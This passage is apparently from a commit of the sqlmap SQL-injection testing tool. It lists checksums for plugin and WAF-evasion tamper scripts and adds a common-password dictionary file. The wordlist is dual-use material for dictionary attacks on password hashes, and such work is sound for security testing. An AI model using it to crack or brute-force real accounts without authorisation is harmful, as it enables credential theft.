plugins/dbms/virtuoso/takeover.py +51c44048e4b335b306f8ed1323fd78ad6935a8c0d6e9d6efe195a9a5a24e46dc plugins/generic/connector.py +a967f4ebd101c68a5dcc10ff18c882a8f44a5c3bf06613d951a739ecc3abb9b3 plugins/generic/custom.py +c091caecc93c01e17fa5432101555cae824492c060b9b7ee35cb49a211365076 plugins/generic/databases.py 
+4050f9dfa8a2f8dbe6ae75f91d71b3d1fa3a4b1bd28404c4a346d5a83ad512df plugins/generic/entries.py +d2de7fc135cf0db3eb4ac4a509c23ebec5250a5d8043face7f8c546a09f301b5 plugins/generic/enumeration.py +a02ac4ebc1cc488a2aa5ae07e6d0c3d5064e99ded7fd529dfa073735692f11df plugins/generic/filesystem.py +efd7177218288f32881b69a7ba3d667dc9178f1009c06a3e1dd4f4a4ee6980db plugins/generic/fingerprint.py +1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 plugins/generic/__init__.py +ba07e54265cf461aed678df49fe3550aec90cb6d8aa9387458bd4b7064670d00 plugins/generic/misc.py +7c1b1f91925d00706529e88a763bc3dabafaf82d6dbc01b1f74aeef0533537a1 plugins/generic/search.py +da8cc80a09683c89e8168a27427efecda9f35abc4a23d4facd6ffa7a837015c4 plugins/generic/syntax.py +eb45fd711efa71ab9d91d815cc8abebc9abc4770311fbb827159008b000f4fc2 plugins/generic/takeover.py +45bfd00f09557e20115e6ce7fb52ff507930d705db215e535f991e5fbf7464de plugins/generic/users.py +1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 plugins/__init__.py +423d9bfaddb3cf527d02ddda97e53c4853d664c51ef7be519e4f45b9e399bc30 README.md +c6ad39bfd1810413402dedfc275fc805fa13f85fc490e236c1e725bde4e5100b sqlmapapi.py +4e993cfe2889bf0f86ad0abafd9a6a25849580284ea279b2115e99707e14bb97 sqlmapapi.yaml +a40607ce164eb2d21865288d24b863edb1c734b56db857e130ac1aef961c80b9 sqlmap.conf +4cec2aae8d65d67cd6db60f00217aa05ab449345ed3a38e04697b85b53d755f1 sqlmap.py +eb37a88357522fd7ad00d90cdc5da6b57442b4fec49366aadb2944c4fbf8b804 tamper/0eunion.py +a9785a4c111d6fee2e6d26466ba5efb3b229c00520b26e8024b041553b53efba tamper/apostrophemask.py +cf26bc8006519bd25ce06d347f72770cd75b61575cf65e5812274e8ab9392eb4 tamper/apostrophenullencode.py +0b9ed12565bf000c9daa2317e915f2325ccabee1fa5ed5552c0787733fbccffe tamper/appendnullbyte.py +11ad15d66c43f32f5d0a39052e5f623a4752ad4fb275d642f2e4cd841ff82b41 tamper/base64encode.py +cb833979eccf26a5e176f7c8ca40a24bf9904cb2902a1b9df436aefb6a24447e tamper/between.py +6e72b92662185a56847cca235106bc354bd6a10e3e89a135b9ea8fa09cd8eb34 tamper/binary.py +9e1852d61d439181c42cb6d28656e9464a1dd5991269f000fb47e107f2f6f4f1 tamper/bluecoat.py +578e36fcf7d596574119ef75cbf1a83040913587a02855f0b6a7e684f9f9c8a5 tamper/chardoubleencode.py +c7892bff56b2b85dfdf9f24c783c569edac57a3fd5a254cf4554987a374206c9 tamper/charencode.py +72c163ff0b4f79bdec07fbea3e75a2eaa8304881d35287eab8f03c25d06e99e0 tamper/charunicodeencode.py +50107854594fb13b4b95eed2ab8e66d2dd5470dd7d6b59c124ca766b1ec4b6ed tamper/charunicodeescape.py +d0d8f2df2c29d81315a867ecb6baa9ca430e8f98d04f4df3879f2bcd697fac16 tamper/commalesslimit.py +1aee4e920b8ffa4a79b2ac9a42e2d7de13434970b3d1e0c6911c26bdd0c7b4e7 tamper/commalessmid.py +ff8d05da2c5a123a231671c97ee80bb77b6631d7e5356d836cfe15ef212b73e5 tamper/commentbeforeparentheses.py +66cad47087c78a5658445f8a00f2e1cd533a6d7c57aec2d1eb1fe486956aa3ea tamper/concat2concatws.py +b5a5ba94a78cf83b35cdb0b08d9d69dbf1f33c07cc5152c560ae5aee54a4c066 tamper/decentities.py +1d6bcc5ffe235840370cd9738b5e8067f8b24e8c0e2bb629d330a7e5c379328a tamper/dunion.py +99c59e6fd7cafc9238c53e037eff457823854eef7cb0c5ea05941e0223229209 tamper/equaltolike.py +b3940e8d029150a81f17a2da1141928c31b6abb9ade3672d093051e310439995 tamper/equaltorlike.py +d528e74ae7c9fc0cd45369046d835a8f1e6f9252eeef6d84d9978d7e329ab35f tamper/escapequotes.py +0694f202a4f57e0a5c4d5aa72eee121b6f344d4e03692d9e267e2212abed719c tamper/greatest.py +26e57bc7c118168f20a5fc80d2d2fdbef05c027328c5c55cbbe92047ee8123da tamper/halfversionedmorekeywords.py +f0a7b635061385a3bf399cc51faf4d5e10694266aaa21fba557ca655c00a09bc 
tamper/hex2char.py +9096cbf2283137d592408325347f46866fd139966c946f8ba1ea61826472d0bb tamper/hexentities.py +3e518ace6940d54e8844c83781756e85d5670c53dfac0a092c4ee36cd5111885 tamper/htmlencode.py +04028ea55034ef5c82167db35cb1276d3d5c717f6b22507b791342ccf82722ad tamper/if2case.py +365085e79d296791464ec3f041a26554b19ba4865c4a727e258e9586b0bcfbe7 tamper/ifnull2casewhenisnull.py +e73e3723d4b61515d7ad2c0fe6e9a9dcaeeac6a93ed6149f44d59e4e41543226 tamper/ifnull2ifisnull.py +94fe273bee7df27c9b4f1ee043779d06e4553169d9aec30c301d469275883dd1 tamper/informationschemacomment.py +1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 tamper/__init__.py +017c91ba64c669382aa88ce627f925b00101a81c1a37a23dba09bfa2bfaf42ae tamper/least.py +d762543ef6d90fd6ce8b897fdfb864e0461d2941922d331d97a334aefdbbe291 tamper/lowercase.py +a890b9da3e103f70137811c73eeddfffa0dcd9fa95d1ff02c40fdc450f1d9beb tamper/luanginxmore.py +93d749469882d9a540397483ad394af161ced3d43b7cefd1fad282a961222d69 tamper/luanginx.py +d68eb164a7154d288ffea398e72229cfc3fc906d0337ca9322e28c243fbd5397 tamper/misunion.py +eafd7ad140281773f92c24dbc299bec318e1c0cced4409e044e94294e40ad030 tamper/modsecurityversioned.py +b533f576b260f485ebb70566c520979608d9f1790aa2811ce8194970b63e0d96 tamper/modsecurityzeroversioned.py +6a6b69def1a9143748fc03aa951486621944e9ee732287e1a39ce713b2b04436 tamper/multiplespaces.py +687f531696809452a37f631cdb201267b04cb83b34a847aec507aca04e2ec305 tamper/ord2ascii.py +07cca753862dc9a2379aea23823d71ad6f4f6716a220e01792467549f8bde95a tamper/overlongutf8more.py +b17748d63b763a7bfd2188f44145345507ce71e1b46f29d747132da5c56d7ed0 tamper/overlongutf8.py +dea9ab017cc4bde6f61f95a4f400ecba441525ff2d2dba886a2bf3ecdc1af605 tamper/percentage.py +5437bc272398173c997d7b156dac1606dcde30421923bfc8f744d3668441d79e tamper/plus2concat.py +3cec7391b8b586474455ef4b089a27c67406ba02f91698647bb113c291f38692 tamper/plus2fnconcat.py +007a21d189bfedd48d4ca2704fb7ea709ea72f4b206e38a7fe40446a12b0a6e3 tamper/randomcase.py +27dfb51abe8f97a833309c2a42c31a63c0eda4711d122639c5ea31e5b5a9021a tamper/randomcomments.py +e11f10ab09c2a7f44ca2a42b35f9db30d1d3715981bd830ea4e00968be51931b tamper/schemasplit.py +21fae428f0393ab287503cc99997fba33c9a001a19f6dd203bbcc420a62a4b90 tamper/scientific.py +7a71736657ca2b27a01f5f988a5c938d67a0f7e9558caba9041bd17b2cef9813 tamper/sleep2getlock.py +856de1573ba9b08f6f33e28ca5a96341697762afa163835dcd4772ba6e1dadc6 tamper/space2comment.py +715b56e60e8f7bf0a1198b356a32374797a8c2e1ba1f888794626205d63c63d5 tamper/space2dash.py +21c43aafe994e798335e6756fbed15f430629beb49042b56d47f232022044a65 tamper/space2hash.py +329fa6e9bb27e1770ccc1c42c3b3ddc8e57a970959d8482ff102d7bfee546a49 tamper/space2morecomment.py +c088e7061a1a4676bc7714f64005ac275fae349f3dc665f2d565f56ecae7619f tamper/space2morehash.py +f823e5afbd5ab8e3fb478d984528c7f675561cf2b4eb6634a5bc11756097a01f tamper/space2mssqlblank.py +0d3b1336a5ca15de0ce5617c153f91ff8715c34cf886a71cb8df5ae887df301d tamper/space2mssqlhash.py +528723c9cea1d91dac22cb44cab6f8f0174f98c3c547b42017589d9a19a314e1 tamper/space2mysqlblank.py +466bb10955155a042fe4ec3b3df6b98193fba1187a376179e0d4dbc068215d91 tamper/space2mysqldash.py +4ea418f8b226b0ab369f3a8e726b7df0bc4701a2d93585de70e13febe5f438b7 tamper/space2plus.py +b3b79bbcf48ba943af57978e32b928d567f28ed4e45651f15f9fe898e00c0331 tamper/space2randomblank.py +6769cbe7b42265ff257a49e17e894bc19ff805802e19f27d57c07a212de70a11 tamper/sp_password.py +8e52309b893770bce57215fd3bf42d53d7f0d164690b4121b598126cbaaf6bc3 tamper/substring2leftright.py 
+d4b29c9a47961430dd0a24c22f8fe2968374ca5b0611e8b2837481c8d77672bf tamper/symboliclogical.py +c442ec7bb6676bdc58447fa54c719a9322b1728ba96c2358081a73fa8a4612ff tamper/unionalltounion.py +9ebf67b9ce10b338edc3e804111abe56158fa0a69e53aacdd0ffa0e0b6af1f70 tamper/unmagicquotes.py +67a83f8b6e99e9bb3344ad6f403e1d784cf9d3f3b7e8e40053cf3181fabe47fa tamper/uppercase.py +3e54d7f98ca75181e6b16aa306d5a5f5f0dce857d5b3e6ce5a07d501f5d915aa tamper/varnish.py +7d469ee594390cbc10378f83af403bba249240eab00f0ad5a5fe0e3fa1fcbf0d tamper/versionedkeywords.py +dcb7a5584390f1604adff075c94139dd23711f2f516b68683ec4208dd0a00fda tamper/versionedmorekeywords.py +ce1b6bf8f296de27014d6f21aa8b3df9469d418740cd31c93d1f5e36d6c509cf tamper/xforwardedfor.py +55eaefc664bd8598329d535370612351ec8443c52465f0a37172ea46a97c458a thirdparty/ansistrm/ansistrm.py +e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 thirdparty/ansistrm/__init__.py +f597b49ef445bfbfb8f98d1f1a08dcfe4810de5769c0abfab7cdce4eebbfcae7 thirdparty/beautifulsoup/beautifulsoup.py +7d62c59f787f987cbce0de5375f604da8de0ba01742842fb2b3d12fcb92fcb63 thirdparty/beautifulsoup/__init__.py +f862301288d2ba2f913860bb901cd5197e72c0461e3330164f90375f713b8199 thirdparty/bottle/bottle.py +9f56e761d79bfdb34304a012586cb04d16b435ef6130091a97702e559260a2f2 thirdparty/bottle/__init__.py +0ffccae46cb3a15b117acd0790b2738a5b45417d1b2822ceac57bdff10ef3bff thirdparty/chardet/big5freq.py +901c476dd7ad0693deef1ae56fe7bdf748a8b7ae20fde1922dddf6941eff8773 thirdparty/chardet/big5prober.py +df0a164bad8aac6a282b2ab3e334129e315b2696ba57b834d9d68089b4f0725f thirdparty/chardet/chardistribution.py +e9b0eef1822246e49c5f871af4881bd14ebd4c0d8f1975c37a3e82738ffd90ee thirdparty/chardet/charsetgroupprober.py +2929b0244ae3ca9ca3d1b459982e45e5e33b73c61080b6088d95e29ed64db2d8 thirdparty/chardet/charsetprober.py +558a7fe9ccb2922e6c1e05c34999d75b8ab5a1e94773772ef40c904d7eeeba0f thirdparty/chardet/codingstatemachine.py +3ca4f31e449bb5b1c3a92f4fcae8cc6d7ef8ab56bc98ca5e4130d5b10859311c thirdparty/chardet/compat.py +4d9e37e105fccf306c9d4bcbffcc26e004154d9d9992a10440bfe5370f5ff68c thirdparty/chardet/cp949prober.py +0229b075bf5ab357492996853541f63a158854155de9990927f58ae6c358f1c5 thirdparty/chardet/enums.py +924caa560d58c370c8380309d9b765c9081415086e1c05bc7541ac913a0d5927 thirdparty/chardet/escprober.py +46e5e580dbd32036ab9ddbe594d0a4e56641229742c50d2471df4402ec5487ce thirdparty/chardet/escsm.py +883f09769d084918e08e254dedfd1ef3119e409e46336a1e675740f276d2794c thirdparty/chardet/eucjpprober.py +fbb19d9af8167b3e3e78ee12b97a5aeed0620e2e6f45743c5af74503355a49fa thirdparty/chardet/euckrfreq.py +32a14c4d05f15b81dbcc8a59f652831c1dc637c48fe328877a74e67fc83f3f16 thirdparty/chardet/euckrprober.py +368d56c9db853a00795484d403b3cbc82e6825137347231b07168a235975e8c0 thirdparty/chardet/euctwfreq.py +d77a7a10fe3245ac6a9cfe221edc47389e91db3c47ab5fe6f214d18f3559f797 thirdparty/chardet/euctwprober.py +257f25b3078a2e69c2c2693c507110b0b824affacffe411bbe2bc2e2a3ceae57 thirdparty/chardet/gb2312freq.py +806bc85a2f568438c4fb14171ef348cab9cbbc46cc01883251267ae4751fca5c thirdparty/chardet/gb2312prober.py +737499f8aee1bf2cc663a251019c4983027fb144bd93459892f318d34601605a thirdparty/chardet/hebrewprober.py +62c3f9c1096c1c9d9ab85d516497f2a624ab080eff6d08919b7112fcd23bebe6 thirdparty/chardet/__init__.py +be9989bf606ed09f209cc5513c730579f4d1be8fe16b59abc8b8a0f0207080e8 thirdparty/chardet/jisfreq.py +3d894da915104fc2ccddc4f91661c63f48a2b1c1654d6103f763002ef06e9e0a thirdparty/chardet/jpcntx.py 
+d47a904bd3dbb678f5c508318ad24cbf0f17ea42abe4ea1c90d09959f110acf1 thirdparty/chardet/langbulgarianmodel.py +2ce0da8efb1eb47f3bc980c340a0360942d7507f3bb48db6ddd85f8e1f59c7d7 thirdparty/chardet/langcyrillicmodel.py +f18016edb53c6304896a9d2420949b3ccc35044ab31a35b3a9ca9fd168142800 thirdparty/chardet/langgreekmodel.py +2529ea984e44eb6b432d33d3bcba50b20e6038c3b83db75646f57b02f91cd070 thirdparty/chardet/langhebrewmodel.py +4616a96121b997465a3be555e056a7e6c5b4591190aa1c0133ad72c77cb1c8e0 thirdparty/chardet/langhungarianmodel.py +f25d35ef71aefd6e86f26c6640e4c417896cd98744ec5c567f74244b11065c94 thirdparty/chardet/langthaimodel.py +5b6d9e44d26ca88eae5807f05d22955969c27ab62aac8f1d6504e6fccd254459 thirdparty/chardet/langturkishmodel.py +4b6228391845937f451053a54855ad815c9b4623fa87b0652e574755c94d914f thirdparty/chardet/latin1prober.py +011f797851fdbeea927ef2d064df8be628de6b6e4d3810a85eac3cb393bdc4b4 thirdparty/chardet/mbcharsetprober.py +87a4d19e762ad8ec46d56743e493b2c5c755a67edd1b4abebc1f275abe666e1e thirdparty/chardet/mbcsgroupprober.py +498df6c15205dc7cdc8d8dc1684b29cbd99eb5b3522b120807444a3e7eed8e92 thirdparty/chardet/mbcssm.py +2c34a90a5743085958c149069300f6a05c4b94f5885974f4f5a907ff63e263be thirdparty/chardet/sbcharsetprober.py +d48a6b70207f935a9f9a7c460ba3016f110b94aa83dec716e92f1823075ec970 thirdparty/chardet/sbcsgroupprober.py +208b7e9598f4589a8ae2b9946732993f8189944f0a504b45615b98f7a7a4e4c4 thirdparty/chardet/sjisprober.py +a8bd35ef8952644e38d9e076d679e4b53f7f55c0327b4ee5685594794ae3b6d6 thirdparty/chardet/universaldetector.py +21d0fcbf7cd63ac07c38b8b23e2fb2fdfab08a9445c55f4d73578a04b4ae204c thirdparty/chardet/utf8prober.py +b29dc1d3c9ab0d707ea5fdcaf5fa89ff37831ce08b0bc46b9e04320c56a9ffb8 thirdparty/chardet/version.py +1c1ee8a91eb20f8038ace6611610673243d0f71e2b7566111698462182c7efdd thirdparty/clientform/clientform.py +e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 thirdparty/clientform/__init__.py +162d2e9fe40ba919bebfba3f9ca88eab20bc3daa4124aec32d5feaf4b2ad4ced thirdparty/colorama/ansi.py +a7070aa13221d97e6d2df0f522b41f1876cd46cb1ddb16d44c1f304f7bab03a3 thirdparty/colorama/ansitowin32.py +d7b5750fa3a21295c761a00716543234aefd2aa8250966a6c06de38c50634659 thirdparty/colorama/initialise.py +f71072ad3be4f6ea642f934657922dd848dee3e93334bc1aff59463d6a57a0d5 thirdparty/colorama/__init__.py +fd2084a132bf180dad5359e16dac8a29a73ebfd267f7c9423c814e7853060874 thirdparty/colorama/win32.py +179e47739cdcb6d8f97713b4ecf2c84502ed9894d20cf941af5010a91b5275ea thirdparty/colorama/winterm.py +4f4b2df6de9c0a8582150c59de2eb665b75548e5a57843fb6d504671ee6e4df3 thirdparty/fcrypt/fcrypt.py +6a70ddcae455a3876a0f43b0850a19e2d9586d43f7b913dc1ffdf87e87d4bd3f thirdparty/fcrypt/__init__.py +dbd1639f97279c76b07c03950e7eb61ed531af542a1bdbe23e83cb2181584fd9 thirdparty/identywaf/data.json +e5c0b59577c30bb44c781d2f129580eaa003e46dcc4f307f08bc7f15e1555a2e thirdparty/identywaf/identYwaf.py +edf23e7105539d700a1ae1bc52436e57e019b345a7d0227e4d85b6353ef535fa thirdparty/identywaf/__init__.py +d846fdc47a11a58da9e463a948200f69265181f3dbc38148bfe4141fade10347 thirdparty/identywaf/LICENSE +e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 thirdparty/__init__.py +879d96f2460bc6c79c0db46b5813080841c7403399292ce76fe1dc0a6ed353d8 thirdparty/keepalive/__init__.py +f517561115b0cfaa509d0d4216cd91c7de92c6a5a30f1688fdca22e4cd52b8f8 thirdparty/keepalive/keepalive.py +e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 thirdparty/magic/__init__.py 
+4d89a52f809c28ce1dc17bb0c00c775475b8ce01c2165942877596a6180a2fd8 thirdparty/magic/magic.py +e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 thirdparty/multipart/__init__.py +2574a2027b4a63214bad8bd71f28cac66b5748159bf16d63eb2a3e933985b0a5 thirdparty/multipart/multipartpost.py +ef70b88cc969a3e259868f163ad822832f846196e3f7d7eccb84958c80b7f696 thirdparty/odict/__init__.py +9a8186aeb9553407f475f59d1fab0346ceab692cf4a378c15acd411f271c8fdb thirdparty/odict/ordereddict.py +3739db672154ad4dfa05c9ac298b0440f3f1500c6a3697c2b8ac759479426b84 thirdparty/pydes/__init__.py +4c9d2c630064018575611179471191914299992d018efdc861a7109f3ec7de5e thirdparty/pydes/pyDes.py +c51c91f703d3d4b3696c923cb5fec213e05e75d9215393befac7f2fa6a3904df thirdparty/six/__init__.py +e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 thirdparty/socks/__init__.py +7027e214e014eb78b7adcc1ceda5aca713a79fc4f6a0c52c9da5b3e707e6ffe9 thirdparty/socks/LICENSE +56ae8fb03a5cf34cc5babb59f8c2c3bb20388a04f94491f6847989428ce49b82 thirdparty/socks/socks.py +e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 thirdparty/termcolor/__init__.py +b14474d467c70f5fe6cb8ed624f79d881c04fe6aeb7d406455da624fe8b3c0df thirdparty/termcolor/termcolor.py +4db695470f664b0d7cd5e6b9f3c94c8d811c4c550f37f17ed7bdab61bc3bdefc thirdparty/wininetpton/__init__.py +7d7ec81c788600d02d557c13f9781bb33f8a699c5a44c4df0a065348ad2ee502 thirdparty/wininetpton/win_inet_pton.py diff --git a/data/txt/smalldict.txt b/data/txt/smalldict.txt new file mode 100644 index 00000000000..96b0cab614a --- /dev/null +++ b/data/txt/smalldict.txt @@ -0,0 +1,10180 @@ + +! +* +***** +****** +******** +********** +************* +------ +: +????? +?????? +!@#$% +!@#$%^ +!@#$%^& +!@#$%^&* +$HEX +0 +0000 +00000 +000000 +0000000 +00000000 +000000000 +0000000000 +0000007 +000001 +000007 +00001111 +0007 +00112233 +0069 +007 +007007 +007bond +0101 +010101 +01010101 +01011980 +01012011 +010203 +01020304 +0123 +01230123 +012345 +0123456 +01234567 +0123456789 +020202 +030300 +030303 +0420 +050505 +06071992 +0660 +070707 +080808 +0815 +090909 +0911 +0987 +098765 +09876543 +0987654321 +0racl3 +!~!1 +1 +100 +1000 +100000 +1001 +100100 +1002 +100200 +1003 +1004 +1005 +1007 +1008 +1010 +101010 +10101010 +1011 +1012 +1013 +1014 +1015 +1016 +1017 +1018 +1020 +10203 +102030 +10203040 +1022 +1023 +1024 +1025 +1026 +1027 +1028 +1029 +102938 +1029384756 +1030 +10301030 +1031 +10311031 +1066 +10sne1 +1101 +110110 +1102 +1103 +1104 +111 +1111 +11111 +111111 +1111111 +11111111 +111111111 +1111111111 +111111a +11112222 +1112 +111222 +111222333 +111222tianya +1114 +1115 +1117 +1120 +1121 +1122 +112211 +11221122 +112233 +11223344 +1122334455 +1123 +112358 +11235813 +1123581321 +1124 +1125 +1129 +11921192 +11922960 +1200 +1201 +1204 +1205 +120676 +1207 +1208 +1209 +1210 +1211 +1212 +121212 +12121212 +1212312121 +1213 +12131213 +121313 +121314 +12131415 +1214 +12141214 +1215 +1216 +121834 +1220 +1221 +12211221 +1223 +1224 +1225 +1226 +1227 +1228 +123 +1230 +123000 +12301230 +123098 +1231 +12312 +123123 +12312312 +123123123 +1231234 +123123a +123123q +123123qwe +123123xxx +12321 +1232323q +123321 +123321123 +123321q +1234 +12341234 +1234321 +12344321 +12345 +123451 +1234512345 +123454321 +1234554321 +123456 +123456! 
+1234560 +1234561 +123456123 +123456123456 +123456654321 +1234567 +12345671 +12345678 +12345678@ +123456781 +123456788 +123456789 +1234567890 +12345678900 +12345678901 +1234567890q +1234567891 +12345678910 +1234567899 +123456789a +123456789abc +123456789asd +123456789q +123456789z +12345678a +12345678abc +12345678q +12345679 +1234567a +1234567Qq +123456987 +123456a +123456a@ +123456aa +123456abc +123456as +123456b +123456c +123456d +123456j +123456k +123456l +123456m +123456q +123456qq +123456qwe +123456qwerty +123456s +123456t +123456z +123456za +123457 +12345a +12345abc +12345abcd +12345q +12345qwert +12345qwerty +12345t +123465 +1234abcd +1234asdf +1234qwer +1235 +123654 +123654789 +12369874 +123698745 +123789 +123789456 +123987 +123a123a +123abc +123admin +123asd +123asdf +123go +123hfjdk147 +123mudar +123qazwsx +123qwe +123qwe123 +123qwe123qwe +123qweasd +123qweasdzxc +123qwerty +123spill +123stella +12413 +1245 +124578 +1269 +12axzas21a +12qw34er +12qwas +12qwaszx +1301 +1313 +131313 +13131313 +13141314 +1314520 +1314521 +1316 +13243546 +1332 +1342 +134679 +134679852 +135246 +1357 +13579 +135790 +135792468 +1357924680 +1369 +140136 +1412 +14121412 +1414 +141414 +14141414 +141421356 +142536 +142857 +1430 +143143 +14344 +1435254 +1453 +14531453 +1464688081 +147147 +147258 +14725836 +147258369 +1475 +147852 +147852369 +1478963 +14789632 +147896325 +1492 +1502 +1515 +151515 +159159 +159159159 +159357 +1596321 +159753 +15975321 +159753qq +159951 +1616 +161616 +168168 +1701 +1701d +170845 +1717 +171717 +17171717 +173173 +1776 +1812 +1818 +181818 +18436572 +1868 +187187 +1878200 +19031903 +19051905 +19071907 +19081908 +1911 +1919 +191919 +1928 +192837465 +1941 +1942 +1943 +1944 +1945 +1946 +1947 +1948 +1949 +1950 +1951 +1952 +1953 +1954 +1955 +1956 +1957 +1958 +1959 +1960 +1961 +1962 +1963 +1964 +19641964 +1965 +1966 +1967 +1968 +1969 +19691969 +196969 +1970 +19701970 +1971 +1972 +19721972 +1973 +19731973 +1974 +19741974 +1975 +19750407 +19751975 +1976 +19761976 +1977 +19771977 +1978 +19781978 +1979 +19791979 +1980 +19801980 +1981 +19811981 +1982 +19821982 +1983 +19831983 +1984 +19841984 +1985 +19851985 +1985329 +1986 +19861986 +1987 +19871987 +1988 +19881988 +1989 +19891989 +1990 +19901990 +1991 +19911991 +1992 +19921992 +1993 +19931993 +1994 +19941994 +1995 +199510 +19951995 +1996 +1997 +19971997 +1998 +19981998 +1999 +199999 +1a2b3c +1a2b3c4d +1g2w3e4r +1million +1p2o3i +1password +1q2w3e +1q2w3e4r +1q2w3e4r5 +1q2w3e4r5t +1q2w3e4r5t6y +1q2w3e4r5t6y7u +1qa2ws3ed +1qay2wsx +1qaz1qaz +1qaz2wsx +1qaz2wsx3edc +1qazxsw2 +1qw23e +1qwerty +1v7Upjw3nT +2000 +200000 +20002000 +2001 +20012001 +2002 +20022002 +2003 +20032003 +2004 +2005 +2010 +20102010 +2012comeer +201314 +2020 +202020 +20202020 +2112 +21122112 +2121 +212121 +21212121 +212224 +212224236 +22 +2200 +2211 +221225 +2222 +22222 +222222 +2222222 +22222222 +2222222222 +222333 +222777 +223344 +22446688 +2252 +2323 +232323 +23232323 +2345 +234567 +23456789 +23skidoo +2424 +242424 +24242424 +2468 +24680 +246810 +24681012 +24682468 +2469 +2501 +25011990 +25132513 +2514 +2516 +25162516 +25182518 +2520 +25202520 +2522 +25222522 +25232523 +25242524 +2525 +25251325 +252525 +25252525 +25262526 +25272527 +25292529 +25302530 +25362536 +256256 +256879 +2580 +25802580 +26011985 +2626 +262626 +2727 +272727 +2828 +282828 +2871 +2879 +290966 +292929 +2971 +29rsavoy +2bornot2b +2cute4u +2fast4u +2gAVOiz1 +2kids +2tjNZkM +3000gt +3006 +3010 +3030 +303030 +303677 +30624700 +3112 +311311 +3131 +313131 +313326339 +3141 +314159 +31415926 +315475 +3182 +31994 
+321123 +321321 +321321321 +321654 +321654987 +32167 +3232 +323232 +3282 +332211 +333 +3333 +33333 +333333 +3333333 +33333333 +333666 +333888 +336699 +3434 +343434 +3533 +353535 +3571138 +362436 +3636 +363636 +36633663 +369 +369258147 +369369 +373737 +383838 +393939 +3bears +3rJs1la7qE +4040 +404040 +4055 +4121 +4128 +414141 +4200 +420000 +420247 +420420 +421uiopy258 +4242 +424242 +426hemi +4293 +4321 +43214321 +434343 +4417 +4444 +44444 +444444 +4444444 +44444444 +445566 +4545 +454545 +456 +456123 +456321 +456456 +456456456 +456654 +4567 +456789 +456852 +464646 +46494649 +46709394 +4711 +474747 +4788 +4815162342 +484848 +485112 +4854 +494949 +49ers +4ever +4tugboat +5000 +5050 +505050 +50cent +5121 +514007 +5150 +515000 +51505150 +515151 +5201314 +520520 +5211314 +521521 +5252 +525252 +5324 +5329 +535353 +5424 +54321 +543210 +5454 +545454 +5551212 +5555 +55555 +555555 +5555555 +55555555 +5555555555 +555666 +5656 +565656 +5678 +567890 +5683 +575757 +57chevy +585858 +589589 +5956272 +59635963 +5RGfSaLj +606060 +616161 +6262 +626262 +6301 +635241 +636363 +6435 +646464 +6535 +654321 +6543211 +655321 +656565 +6655321 +666 +6666 +66666 +666666 +6666666 +66666666 +666777 +666999 +676767 +6820055 +686868 +6969 +696969 +69696969 +6996 +6V21wbgad +7007 +709394 +7153 +717171 +727272 +737373 +74108520 +741852 +741852963 +747474 +753159 +753951 +7546 +757575 +7646 +7654321 +767676 +7734 +7758258 +7758521 +777 +7777 +77777 +777777 +7777777 +77777777 +7779311 +778899 +786786 +787878 +789123 +7894 +789456 +78945612 +789456123 +7894561230 +789654 +789654123 +789789 +789987 +7913 +7936 +797979 +7dwarfs +80486 +818181 +851216 +85208520 +852456 +8657 +8675309 +868686 +8757 +87654321 +878787 +8888 +88888 +888888 +8888888 +88888888 +8989 +898989 +8avLjNwf +90210 +909090 +90909090 +911 +911911 +9379992 +951753 +951753aa +959595 +963852 +963852741 +969696 +9768 +985985 +987456 +987456321 +9876 +98765 +987654 +9876543 +98765432 +987654321 +9876543210 +987987 +989898 +99887766 +9999 +99999 +999999 +9999999 +99999999 +999999999 +9999999999 +a +a102030 +a123123 +a12345 +a123456 +a1234567 +a12345678 +a123456789 +A123456a +a1a2a3 +a1b2c3 +a1b2c3d4 +a1s2d3f4 +a56789 +a838hfiD +aa +aa000000 +aa112233 +aa123123 +aa123456 +Aa1234567 +aa12345678 +Aa123456789 +aaa +aaa111 +aaa123 +aaaa +aaaa1111 +aaaaa +aaaaa1 +aaaaaa +aaaaaa1 +aaaaaaa +aaaaaaaa +aaaaaaaaaa +aabb1122 +aaliyah +aardvark +aaron +Ab123456 +abacab +abbott +abby +abc +abc123 +Abc@123 +abc1234 +Abc@1234 +abc12345 +abc123456 +abcabc +abcd +abcd123 +abcd1234 +Abcd@1234 +Abcd1234 +abcde +abcdef +abcdefg +abcdefg1 +abcdefg123 +abcdefgh +abcdefghi +abdullah +abercrombie +aberdeen +abgrtyu +abhishek +abigail +abm +abnormal +abraham +abrakadabra +absinthe +absolut +absolute +abstract +academia +academic +acapulco +access +access14 +accident +accord +ACCORD +account +account1 +accounting +accurate +ace +achilles +acoustic +acropolis +action +activity +acura +adam +adamadam +adamko +adams +addict +addicted +addiction +adelaida +adelante +adfexc +adgangskode +adi +adidas +aditya +adm +admin +Admin +admin000 +admin1 +Admin1 +admin12 +admin123 +Admin1234 +admin256 +adminadmin +adminadmin123 +administrator +ADMINISTRATOR +adminpass +adminpwd +adobe1 +adobe123 +adrenalin +adrenaline +adrian +adriana +adrianna +adrianne +adults +advance +advocate +aek1924 +aekara21 +aerobics +aerospace +affinity +afghanistan +africa +afterlife +again +agamemnon +aggies +agnieszka +agosto +aguilas +agustin +ahl +ahm +aikman +aikotoba +aileen +airborne +aircraft +airforce +airlines +airman 
+airplane +aisiteru +ak +akatsuki +aki123 +akira +akuankka +alabama +alabaster +alakazam +alan +alanis +alaska +alastair +albacore +albatros +albatross +albert +alberta +alberto +alberto1 +albion +alcapone +alcatraz +alchemist +alchemy +alejandr +alejandra +alejandro +alekos +aleksandr +aleksandra +aleksi +alenka +alessandra +alessandro +alessia +alessio +alex +alex2000 +alexa +alexande +alexander +alexander1 +alexandr +alexandra +alexandre +alexandria +alexandru +alexia +alexis +alexis1 +alf +alfaro +alfarome +alfred +alfredo +algebra +algernon +alias +alibaba +alicante +alice +alice1 +alicia +alisa +alisha +alison +alissa +alistair +alive +alkaline +all4one +alleycat +allgood +alli +alliance +alligator +allison +allison1 +allister +allmine +allright +allsop +allstar +allstars +allstate +almafa +almighty +almond 